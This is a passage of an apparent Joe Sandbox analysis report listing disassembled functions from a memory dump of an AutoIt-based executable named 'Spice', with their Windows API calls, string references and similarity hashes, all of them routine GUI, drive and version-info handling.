GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EE7DA9
DeleteDC.GDI32(00000000), ref: 00EE7DB2
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EE7DDE
SendMessageW.USER32(00000030,00000000,00000001), ref: 00EE7DF5
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EE7E30
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EE7E44
SendMessageW.USER32(00000404,00000001,00000000), ref: 00EE7E55
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EE7E85
GetStockObject.GDI32(00000011), ref: 00EE7E90
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EE7E9B
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EE7EA5

Strings

AutoIt v3, xrefs: 00EE7D15
DISPLAY, xrefs: 00EE7D72
msctls_progress32, xrefs: 00EE7E26
static, xrefs: 00EE7D67, 00EE7E7F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: c8b636dda46acdd3506ad5692db7c8a2478082909ca7079487872344c4ce65bb
Instruction ID: f8ca345a444f9758c03fbf6e87b167f7a556495d7196c14bd8c780fe10e99332
Opcode Fuzzy Hash: c8b636dda46acdd3506ad5692db7c8a2478082909ca7079487872344c4ce65bb
Instruction Fuzzy Hash: DEA163B1640619BFEB14DB64DC4AFAFB7A9EB09710F144114FA15A72E0CB70AD01DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00EDB353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00EDB361
GetDriveTypeW.KERNEL32(?,00F02C4C,?,\\.\,00F00980), ref: 00EDB43E
SetErrorMode.KERNEL32(00000000,00F02C4C,?,\\.\,00F00980), ref: 00EDB59C

Strings

RAID, xrefs: 00EDB53A
SAS, xrefs: 00EDB548
SSD, xrefs: 00EDB4C9
Removable, xrefs: 00EDB490
Unknown, xrefs: 00EDB45E, 00EDB502
SSA, xrefs: 00EDB525
ATAPI, xrefs: 00EDB510
RAMDisk, xrefs: 00EDB468
PhysicalDrive, xrefs: 00EDB3EA
1394, xrefs: 00EDB51E
Network, xrefs: 00EDB47C
Virtual, xrefs: 00EDB564
ATA, xrefs: 00EDB517
MMC, xrefs: 00EDB55D
\\.\, xrefs: 00EDB3B3
USB, xrefs: 00EDB533
SCSI, xrefs: 00EDB509
CDROM, xrefs: 00EDB472
iSCSI, xrefs: 00EDB541
SATA, xrefs: 00EDB54F
Fibre, xrefs: 00EDB52C
Fixed, xrefs: 00EDB486
FileBackedVirtual, xrefs: 00EDB56B

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: f268c561a84caa4c188af14c648dbb13195e0d20f647de156b678c0b275aefe5
Instruction ID: 39b26b4a45e186ee9d82bdd54df42f0b694d05fdf9c6b61b880e1db70a571d7b
Opcode Fuzzy Hash: f268c561a84caa4c188af14c648dbb13195e0d20f647de156b678c0b275aefe5
Instruction Fuzzy Hash: F5517570B44209DBCB00DB20E942ABD77E2FB45744B25615BE806B7391F771EE43AB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EFA041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00EFA0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00EFA1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 00EFA1CC

Strings

0, xrefs: 00EFA209

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: d07afca3e229a2f7e1ee7a7268177854c1e5a2fe5b4959e1b746514331bf2a94
Instruction ID: 4455c5c8130fe3d103c885b91a4d0f0f436d975838e2b10d920e042f2f734bd6
Opcode Fuzzy Hash: d07afca3e229a2f7e1ee7a7268177854c1e5a2fe5b4959e1b746514331bf2a94
Instruction Fuzzy Hash: CC02F3B0104309AFD715CF14C848BBABBE5FF85318F08952DF699AB2A1CB75D940DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EFAF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00EFAF51
SetTextColor.GDI32(?,?), ref: 00EFAF55
GetSysColorBrush.USER32(0000000F), ref: 00EFAF6B
GetSysColor.USER32(0000000F), ref: 00EFAF76
CreateSolidBrush.GDI32(?), ref: 00EFAF7B
GetSysColor.USER32(00000011), ref: 00EFAF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EFAFA1
SelectObject.GDI32(?,00000000), ref: 00EFAFB2
SetBkColor.GDI32(?,00000000), ref: 00EFAFBB
SelectObject.GDI32(?,?), ref: 00EFAFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 00EFAFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EFAFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 00EFB013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EFB05F
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EFB086
InflateRect.USER32(?,000000FD,000000FD), ref: 00EFB0A4
DrawFocusRect.USER32(?,?), ref: 00EFB0AF
GetSysColor.USER32(00000011), ref: 00EFB0BD
SetTextColor.GDI32(?,00000000), ref: 00EFB0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00EFB0D9
SelectObject.GDI32(?,00EFAC1F), ref: 00EFB0F0
DeleteObject.GDI32(?), ref: 00EFB0FB
SelectObject.GDI32(?,?), ref: 00EFB101
DeleteObject.GDI32(?), ref: 00EFB106
SetTextColor.GDI32(?,?), ref: 00EFB10C
SetBkColor.GDI32(?,?), ref: 00EFB116

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 690bf5a3bfdb2d18e7adddd73187e2b67acbbd6554aff88c307d8cce625be6e8
Instruction ID: bb355e6c22495615c4c83e5141bc15687edf17d646add27924a5f62096e41541
Opcode Fuzzy Hash: 690bf5a3bfdb2d18e7adddd73187e2b67acbbd6554aff88c307d8cce625be6e8
Instruction Fuzzy Hash: 506119B290021DAFDB119FA4DC48BAE7B79FF08320F158115FA15BB2A1DB759940DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00EF8FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EF90EA
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF90FB
CharNextW.USER32(0000014E), ref: 00EF912A
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EF916B
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EF9181
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF9192
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EF91AF
SetWindowTextW.USER32(?,0000014E), ref: 00EF91FB
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EF9211
SendMessageW.USER32(?,00001002,00000000,?), ref: 00EF9242
_memset.LIBCMT ref: 00EF9267
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EF92B0
_memset.LIBCMT ref: 00EF930F
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EF9339
SendMessageW.USER32(?,00001074,?,00000001), ref: 00EF9391
SendMessageW.USER32(?,0000133D,?,?), ref: 00EF943E
InvalidateRect.USER32(?,00000000,00000001), ref: 00EF9460
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EF94AA
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EF94D7
DrawMenuBar.USER32(?), ref: 00EF94E6
SetWindowTextW.USER32(?,0000014E), ref: 00EF950E

Strings

0, xrefs: 00EF9478

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 3cdc0369cef1eb21c9ce6844d75b7a8759a111af92ba2d87776aff9232169ae6
Instruction ID: b83832f9e62ca61351670c86122dacb909a50bf4223b94df4ed8aa034f44d89a
Opcode Fuzzy Hash: 3cdc0369cef1eb21c9ce6844d75b7a8759a111af92ba2d87776aff9232169ae6
Instruction Fuzzy Hash: 8BE19B7090020DABDF219F94CC84FFE7BB9EB09714F109156FA55BA292DB718A81DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00EF4ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00EF5007
GetDesktopWindow.USER32 ref: 00EF501C
GetWindowRect.USER32(00000000), ref: 00EF5023
GetWindowLongW.USER32(?,000000F0), ref: 00EF5085
DestroyWindow.USER32(?), ref: 00EF50B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EF50DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EF50F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00EF511E
SendMessageW.USER32(?,00000421,?,?), ref: 00EF5133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00EF5146
IsWindowVisible.USER32(?), ref: 00EF5166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00EF5181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00EF5195
GetWindowRect.USER32(?,?), ref: 00EF51AD
MonitorFromPoint.USER32(?,?,00000002), ref: 00EF51D3
GetMonitorInfoW.USER32(00000000,?), ref: 00EF51ED
CopyRect.USER32(?,?), ref: 00EF5204
SendMessageW.USER32(?,00000412,00000000), ref: 00EF526F

Strings

tooltips_class32, xrefs: 00EF50D3
(, xrefs: 00EF51E0
0, xrefs: 00EF4FB2

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 9f6d16e40dddfc761df554755e0fd782c2fcdb147c74d3b313d26daf15a50e58
Instruction ID: d58e442b0ab6939ed42584cc6caba36cd71f11712b3cba8d9af6724510bbb515
Opcode Fuzzy Hash: 9f6d16e40dddfc761df554755e0fd782c2fcdb147c74d3b313d26daf15a50e58
Instruction Fuzzy Hash: D7B17B72604744AFD704DF64D844B6ABBE5FF88314F009A1CF699AB2A1DB71EC05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00ED498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00ED499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00ED49C2
_wcscpy.LIBCMT ref: 00ED49F0
_wcscmp.LIBCMT ref: 00ED49FB
_wcscat.LIBCMT ref: 00ED4A11
_wcsstr.LIBCMT ref: 00ED4A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00ED4A38
_wcscat.LIBCMT ref: 00ED4A81
_wcscat.LIBCMT ref: 00ED4A88
_wcsncpy.LIBCMT ref: 00ED4AB3

Strings

StringFileInfo\, xrefs: 00ED4A0B
\VarFileInfo\Translation, xrefs: 00ED4A30
DefaultLangCodepage, xrefs: 00ED4A9B
%u.%u.%u.%u, xrefs: 00ED4B16
04090000, xrefs: 00ED4A6E

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: dc4c902d2c735426ec1e97f44744f276b342b0ca99cd743d16c178b2f3c5b40d
Instruction ID: d877fd9a17229ec68d67d00e134bf8196b917892225b437385eb13bc811201c2
Opcode Fuzzy Hash: dc4c902d2c735426ec1e97f44744f276b342b0ca99cd743d16c178b2f3c5b40d
Instruction Fuzzy Hash: 1741E572604215BBEF15B7709C46EBF77ACEF51710F00105AF908B62D2EB35DA02A6A6

Uniqueness

Uniqueness Score: -1.00%

Function 00E72BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E72C8C
GetSystemMetrics.USER32(00000007), ref: 00E72C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E72CBF
GetSystemMetrics.USER32(00000008), ref: 00E72CC7
GetSystemMetrics.USER32(00000004), ref: 00E72CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E72D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E72D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E72D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E72D60
GetClientRect.USER32(00000000,000000FF), ref: 00E72D7E
GetStockObject.GDI32(00000011), ref: 00E72D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00E72DA5

Part of subcall function 00E72714: GetCursorPos.USER32(?), ref: 00E72727
Part of subcall function 00E72714: ScreenToClient.USER32(00F377B0,?), ref: 00E72744
Part of subcall function 00E72714: GetAsyncKeyState.USER32(00000001), ref: 00E72769
Part of subcall function 00E72714: GetAsyncKeyState.USER32(00000002), ref: 00E72777

SetTimer.USER32(00000000,00000000,00000028,00E713C7), ref: 00E72DCC

Strings

AutoIt v3 GUI, xrefs: 00E72D44

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: cdaa09f72f468fe95abec9e871abc159c614b696b61acc7f5d77ee7bc3d8ede1
Instruction ID: 757462eb8c3dff432dbcb7aae7bb1331052f18544bce00375541dfdc9d97ab85
Opcode Fuzzy Hash: cdaa09f72f468fe95abec9e871abc159c614b696b61acc7f5d77ee7bc3d8ede1
Instruction Fuzzy Hash: 86B17E7160020EAFDB14DFA8DC55BED7BB5FB08314F209229FA19A7290DB74A850DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00E90429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B

GetForegroundWindow.USER32(00F00980,?,?,?,?,?), ref: 00E904E3
IsWindow.USER32(?), ref: 00EC66BB

Strings

ACTIVE, xrefs: 00EC6488
REGEXPTITLE, xrefs: 00EC64B4
REGEXPCLASS, xrefs: 00EC6506
LAST, xrefs: 00EC6472
INSTANCE, xrefs: 00EC65FA
CLASS, xrefs: 00EC64E5
TITLE, xrefs: 00EC6650
HANDLE, xrefs: 00EC649E
ALL, xrefs: 00EC6622

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 43ce9d6be942913fc2000f339b15576cfde947dcae516fc17ad0c003c19d90aa
Instruction ID: a0d17aaf966df9771e10bf7d9f5a052665426f6225cf9565ba8944e3adb1ca4d
Opcode Fuzzy Hash: 43ce9d6be942913fc2000f339b15576cfde947dcae516fc17ad0c003c19d90aa
Instruction Fuzzy Hash: 57D18270104202DFCB08EF20C541AABBBF5BF54348F506A1DF459776A2DB31E99ADB92

Uniqueness

Uniqueness Score: -1.00%

Function 00EF441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00EF44AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EF456C

Strings

VIEWCHANGE, xrefs: 00EF472B
DESELECT, xrefs: 00EF465A
SELECTINVERT, xrefs: 00EF463C
SELECT, xrefs: 00EF4606
GETSELECTEDCOUNT, xrefs: 00EF454F
FINDITEM, xrefs: 00EF46DF
GETSUBITEMCOUNT, xrefs: 00EF44F7
GETITEMCOUNT, xrefs: 00EF44DE
GETTEXT, xrefs: 00EF4515
ISSELECTED, xrefs: 00EF4577
SELECTCLEAR, xrefs: 00EF45EB
SELECTALL, xrefs: 00EF45D3
GETSELECTED, xrefs: 00EF469A

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: a11b72f057144a53b80a8513324d84b8221c6f6e23e35069d17656a49eb5d9f7
Instruction ID: 0129984ba30ff546eaa01f194e6e46db2ea839448ad44ab0c346dcdb07a3b2dd
Opcode Fuzzy Hash: a11b72f057144a53b80a8513324d84b8221c6f6e23e35069d17656a49eb5d9f7
Instruction Fuzzy Hash: 2DA18EB02042159FCB14FF20C851A7AB3E5AF85314F50A968F99ABB3D2DB30ED05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EE56C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00EE56E1
LoadCursorW.USER32(00000000,00007F8A), ref: 00EE56EC
LoadCursorW.USER32(00000000,00007F00), ref: 00EE56F7
LoadCursorW.USER32(00000000,00007F03), ref: 00EE5702
LoadCursorW.USER32(00000000,00007F8B), ref: 00EE570D
LoadCursorW.USER32(00000000,00007F01), ref: 00EE5718
LoadCursorW.USER32(00000000,00007F81), ref: 00EE5723
LoadCursorW.USER32(00000000,00007F88), ref: 00EE572E
LoadCursorW.USER32(00000000,00007F80), ref: 00EE5739
LoadCursorW.USER32(00000000,00007F86), ref: 00EE5744
LoadCursorW.USER32(00000000,00007F83), ref: 00EE574F
LoadCursorW.USER32(00000000,00007F85), ref: 00EE575A
LoadCursorW.USER32(00000000,00007F82), ref: 00EE5765
LoadCursorW.USER32(00000000,00007F84), ref: 00EE5770
LoadCursorW.USER32(00000000,00007F04), ref: 00EE577B
LoadCursorW.USER32(00000000,00007F02), ref: 00EE5786
GetCursorInfo.USER32(?), ref: 00EE5796
GetLastError.KERNEL32(00000001,00000000), ref: 00EE57C1

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: e6350017a19114623c1e1a85aee474831471f2756fbcb5906fa04f5d2ca56f33
Instruction ID: 6f9c490aba00eb3fd612376a194cfe576325aba16a5b8ba3d7688446e3b042d1
Opcode Fuzzy Hash: e6350017a19114623c1e1a85aee474831471f2756fbcb5906fa04f5d2ca56f33
Instruction Fuzzy Hash: 9B415371E04319AADB109FBA8C49D6EFEF8EF51B14F10452FE549E7290DAB8A401CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00ECB13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00ECB17B
__swprintf.LIBCMT ref: 00ECB21C
_wcscmp.LIBCMT ref: 00ECB22F
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ECB284
_wcscmp.LIBCMT ref: 00ECB2C0
GetClassNameW.USER32(?,?,00000400), ref: 00ECB2F7
GetDlgCtrlID.USER32(?), ref: 00ECB349
GetWindowRect.USER32(?,?), ref: 00ECB37F
GetParent.USER32(?), ref: 00ECB39D
ScreenToClient.USER32(00000000), ref: 00ECB3A4
GetClassNameW.USER32(?,?,00000100), ref: 00ECB41E
_wcscmp.LIBCMT ref: 00ECB432
GetWindowTextW.USER32(?,?,00000400), ref: 00ECB458
_wcscmp.LIBCMT ref: 00ECB46C

Part of subcall function 00E9385C: _iswctype.LIBCMT ref: 00E93864

Strings

%s%u, xrefs: 00ECB216

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
